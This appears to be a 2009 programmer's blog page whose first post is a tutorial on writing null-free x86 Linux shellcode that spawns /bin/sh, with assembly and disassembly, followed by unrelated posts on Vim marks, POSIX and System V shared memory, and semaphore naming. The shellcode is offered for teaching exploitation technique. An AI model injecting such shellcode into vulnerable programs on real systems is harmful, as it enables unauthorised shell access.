Thursday, February 26, 2009

asm: writing shellcode/getting rid of data section and nulls

Most probably you want your shellcode to execute "/bin/sh" on target box. Here you have to deal somehow with string, which in normal programs is stored in data section.

The problem you may face when you are writing a shellcode is that you can't just use data section in your shellode - your shellcode and target application use different data sections.

First of all I've tried to use call instruction. When processor executes call it automatically puts address of the next instruction into esp register. We can use this "feature" keeping in mind that call works with addresses, that means that we can use address of instruction rather than function's.
Let's look at the code below

 2 .global main
 4 main:
 5     jmp     two
 6 one:
 7     movl    (%esp), %ebx
 8     xor     %eax, %eax 
10     pushl   %eax
11     pushl   %ebx
12     movl    %esp, %ecx
14     xorl    %edx, %edx
16     movl    $11, %eax 
17     int     $0x80
18 two:
19     call    one
20     .string "/bin/sh"
Just in the beginning processor jumps to label two. Then it executes call: puts address of the next instruction and jumps to label one. Here is the most interesting part. The address of the "next instruction" after the "call one" is our string.
So when we are already in label one we have address of the string "/bin/sh" in esp.
Then the code prepares registers for system call execve. Number of syscall execve(11) to eax, path to executable to ebx, argv array to ecx and envp array to edx. argv array I simulated with pushing values to stack and putting address of the top of the stack to ebx, I don't push any environment variables, so %edx is null.

This code is valid and will execute /bin/sh if you compile it and execute.
(~~) gcc test.s -o test 
(~~) ./test 
The problem here is that it contains nulls:
080483b4 <main>:
 80483b4: eb 12                 jmp    80483c8 <two>

080483b6 <one>:
 80483b6: 8b 1c 24              mov    (%esp),%ebx
 80483b9: 31 c0                 xor    %eax,%eax
 80483bb: 50                    push   %eax
 80483bc: 53                    push   %ebx
 80483bd: 89 e1                 mov    %esp,%ecx
 80483bf: 31 d2                 xor    %edx,%edx
 80483c1: b8 0b 00 00 00        mov    $0xb,%eax
 80483c6: cd 80                 int    $0x80

080483c8 <two>:
 80483c8: e8 e9 ff ff ff        call   80483b6 <one>
 80483cd: 2f                    das    
 80483ce: 62 69 6e              bound  %ebp,0x6e(%ecx)
 80483d1: 2f                    das    
 80483d2: 73 68                 jae    804843c <__libc_csu_init+0x4c>
 80483d4: 00 90 90 90 90 90     add    %dl,-0x6f6f6f70(%eax)
 80483da: 90                    nop    
 80483db: 90                    nop    
 80483dc: 90                    nop    
 80483dd: 90                    nop    
 80483de: 90                    nop    
 80483df: 90                    nop    
Almost all stack overflow attacks uses libc string function to overwrite execution point of function or return point with the chellcode. If shellcode contains null characters it could not be read to the end and the attack will fail.
The "main" null is in our string "/bin/sh". execve doesn't work with not a null-ending strings. I tried to make the string like "/bin/shx" and define it as ascii:
.ascii  "/bin/shx"
and later in runtime override the last character with null but all the time I got segmentation violation alert. I suppose that this is because I was trying to modify read-only section. This became a dead-end for me.
I decided to try another way of defining the string. String after all is an array of bytes. So we can just put these bytes somewhere else is some other representation.
Let's look at the string "/bin/sh" from the other side.
(~~) echo -n "/bin/sh" | hexdump 
0000000 622f 6e69 732f 0068
Aligned to 4 it still contain null, but this is not a problem, we can divide it into 2-bytes chunks:
And now we can use word-long instructions. Let's look at the updated code of our shell program.
 2 .global main
 4 main:
 5     xor     %eax, %eax
 7     pushl   %eax
 8     pushw   $0x68
 9     pushw   $0x732f
10     pushw   $0x6e69
11     pushw   $0x622f
13     movl    %esp, %ebx
15     pushl   %eax
16     pushl   %ebx
17     movl    %esp, %ecx
19     xorl    %edx, %edx
21     movl    $11, %eax
22     int     $0x80
I've pushed word-long chunks of the string onto the stack(at first I've pushed zeroed eax to indicate end of string) and put moved address of the head of the stack to ebx. That's almost all. If you still try to compile this code you'd probably find out some zeros. That's because of the movl $11, %eax instruction. 11 could be hold in one byte-long memory node but movl will align memory to 4 bytes with zeros. So just changing from movl to movb will remove this last zero. The latest code should be like
 2 .global main
 4 main:
 5     xor     %eax, %eax
 7     pushl   %eax
 8     pushw   $0x68
 9     pushw   $0x732f
10     pushw   $0x6e69
11     pushw   $0x622f
13     movl    %esp, %ebx
15     pushl   %eax
16     pushl   %ebx
17     movl    %esp, %ecx
19     xorl    %edx, %edx
21     movb    $11, %al
22     int     $0x80
Compiling it and obtaining the machine codes I can see there is no zeros there:
080483b4 <main>
 80483b4: 31 c0                 xor    %eax,%eax
 80483b6: 50                    push   %eax
 80483b7: 66 6a 68              pushw  $0x68
 80483ba: 66 68 2f 73           pushw  $0x732f
 80483be: 66 68 69 6e           pushw  $0x6e69
 80483c2: 66 68 2f 62           pushw  $0x622f
 80483c6: 89 e3                 mov    %esp,%ebx
 80483c8: 50                    push   %eax
 80483c9: 53                    push   %ebx
 80483ca: 89 e1                 mov    %esp,%ecx
 80483cc: 31 d2                 xor    %edx,%edx
 80483ce: b0 0b                 mov    $0xb,%al
 80483d0: cd 80                 int    $0x80
The shellcode string will look like

Monday, February 23, 2009

vim: navigation with marks

Each time I touch different systems I realise that ViM is really powerful editor.

Browsing long source files you likely will jump between different pieces of code inside the file.
Of course you can keep in mind the line numbers but if you insert lines the block below will be shifted and so on.

Better way to use marks. Marks is a simple mechanism to navigate through the file.

Here is the list of commands to use marks in ViM:

mx tells Vim to add a mark called x, x could be in range of [a-zA-Z]
`x tells Vim to return to the line and column for mark x
'x tells Vim to return to the beginning of the line where mark x is set
g`x tells Vim to return to the line and column for mark x but don't change the jumplist
g'x tells Vim to return to the beginning of the line where mark x is set  but don't change the jumplist
`. moves the cursor to the line and column where the last edit was made
'. moves the cursor to the line where the last edit was made
'" moves the cursor to the last position of the cursor when you exited the previous session
'' moves the cursor to the line before the latest jump
`` moves the cursor to the line and column before the latest jump
:marks shows all marks set
:jumps shows the jumplist
Ctrl-o moves the cursor to the last jump
Ctrl-i moves the cursor to the previous jump

Marks with lowercase names are valid within one file, marks with uppercase names are valid between files.

Lowercase marks are remembered as long as the file remains in the
buffer list.
Uppercase marks include the file name. It's possible to use them to jump from file to file.

Worth to mention that the line number of the mark remains correct, even if you insert/delete lines or edit another file for a moment.

Marks could be used with common ViM operations: d, y, etc.
For example y'x tells ViM to copy text between current position and mark x into the buffer.

Special marks ' and ` could be used as lowercase marks - you can set their position.

There are a lot of other special marks, which description you can find in ViM manual.

Tuesday, February 10, 2009

linux: key for sem_open/shm_open

sem_open and shm_open are used to associate key with system semaphore and shared memory object accordingly.
I used them without any problems with a key randomly generated until I started to fail to receive valid object descriptors with ENOENT("No such file or directory").
According to man pages ENOENT could happen if there was an attempt to open an object with a name that did not exist, and O_CREAT was not specified.
I wondered why that could happen because I used O_CREAT and if even object didn't exist with given name it should be created.
I remember that in linux named semaphores and shared data objects are being created in a virtual filesystem usually mounted under /dev/shm.
I started to analyze the key I used to generate.
The problem was that in the name I've generated could appear slash characters and characters not conforming to filesystem valid file name. That caused failure of creating inode on the filesystem and sem_open and shm_open failed also.

To summarize the key for sem_open and shm_open should have leading slash and contain no other slashes or non-valid characters of file name on filesystem. This is of course implementation-defined but for portability this rule should be used to generate the key.

Some notes for FreeBSD.
sem_open is known to be buggy in FreeBSD. The name of semaphore shouldn't be longer than 13 characters.
shm_open behaves differently in FreeBSD than in Linux. path argument should be valid pathname within filesystem. shm_open is a wrapper over open libc call. So the best solution to generate path with tmpnam from libc to make it unique or to prefix with '/tmp/' for other cases to ensure that this file won't be lost somewhere in the filesystem. shm_unlink should remove it but in case of application crush it could not happen.

Thursday, February 5, 2009

blog: prettify

I've used jquery and Javascript code prettifier to make the code snippets look more readable.
I'm too lazy and made the things automatic. So some pieces of posts(especially of the programs' output) don't look good. In the future I'll try to fix this.

Tuesday, February 3, 2009

*nix: XSI shared memory

When you work with POSIX shared memory objects you can get the size of the shared memory space assigned to key by opening with shm_open routine and and checking st_size field of struct stat obtained from fstat libc call. Then you use this value to map memory area into the userspace with mmap.

With System V IPC model you are using int shmget(key_t key, size_t size, int shmflg) routine to map the shared memory. For mapping already existing object you should call it with value of size exactly to the size of existing shared memory object. According to man pagesyou'll get EINVAL in case of size is less than the system-imposed minimum or greater than the system-imposed maximum. Also you are not allowed to specify size less than actual size of existing memory segment for the key.
In some manuals I saw remark for tuple of EINVAL and size:

No shared memory segment is to be created and a shared memory segment exists for key but the size of the segment associated with it is less than size and size is not 0.

In comp.programming.threads there was a discussion regarding size argument for shmget. From the conversation I concluded that size is used _only_for_creation_ of the memory segment.
Walking through the sources of linux kernel I've found that if the key exists and other lags are ok, the kernel finally calls shm_more_checks:
static inline int shm_more_checks(struct kern_ipc_perm *ipcp,
                                struct ipc_params *params)
        struct shmid_kernel *shp;

        shp = container_of(ipcp, struct shmid_kernel, shm_perm);
        if (shp->shm_segsz < params->u.size)
                return -EINVAL;

        return 0;
shm_more_checks indeed just checks if requested size is less or equal than the size of the shared object and if this conditions is satisfied this routine successfully returns.

While we couldn't know the actual size of the shared memory segment we can do a trick and pass 0 as a size to shmget. Later shmctl could be used to check the actual size.

I wrote sample dummy programs that proves the thesis above.

Writer, creates shared memory object and writes argv[1] into it
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/shm.h>

#define SHM_KEY 0x0001b6e6

int main(int argc, char *argv[])
        if (argc < 2)
                printf("usage: writer \"[data to write]\"\n");

                return 1;

        int size = strlen(argv[1]);

        int shmid = shmget(SHM_KEY, size + 1, 0644 | IPC_CREAT);

        char *data = shmat(shmid, NULL, 0); 
        strncpy(data, argv[1], size);



        shmctl(shmid, IPC_RMID, NULL);

        return 0;

Reader, gets the shared object, checks the size and copies data from the shared memory segment:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/shm.h>

#define SHM_KEY 0x0001b6e6

int main(int argc, char *argv[])
        int shmid = shmget(SHM_KEY, 0, 0644 | IPC_CREAT);

        struct shmid_ds ds; 
        shmctl(shmid, IPC_STAT, &ds);
        printf("Size: \"%d\"\n", ds.shm_segsz);

        char *data = shmat(shmid, NULL, 0); 
        printf("Sata: \"%s\"\n", data);


        return 0;

The output of these programs:
$ ./writer "some text"

$ ipcs -m | awk '{if ($1 == "0x0001b6e6" || $1 == "key") {print $0}}'
key        shmid      owner      perms      bytes      nattch     status      
0x0001b6e6 11829291   niam      644        10         0

$ ./reader 
Size: "10"
Sata: "some text"
And for another input data for writer to insure that this works as expected:
$ ./writer "some longer text"

$ ipcs -m | awk '{if ($1 == "0x0001b6e6" || $1 == "key") {print $0}}'
key        shmid      owner      perms      bytes      nattch     status      
0x0001b6e6 11862059   niam      644        17         0

$ ./reader 
Size: "17"
Sata: "some longer text"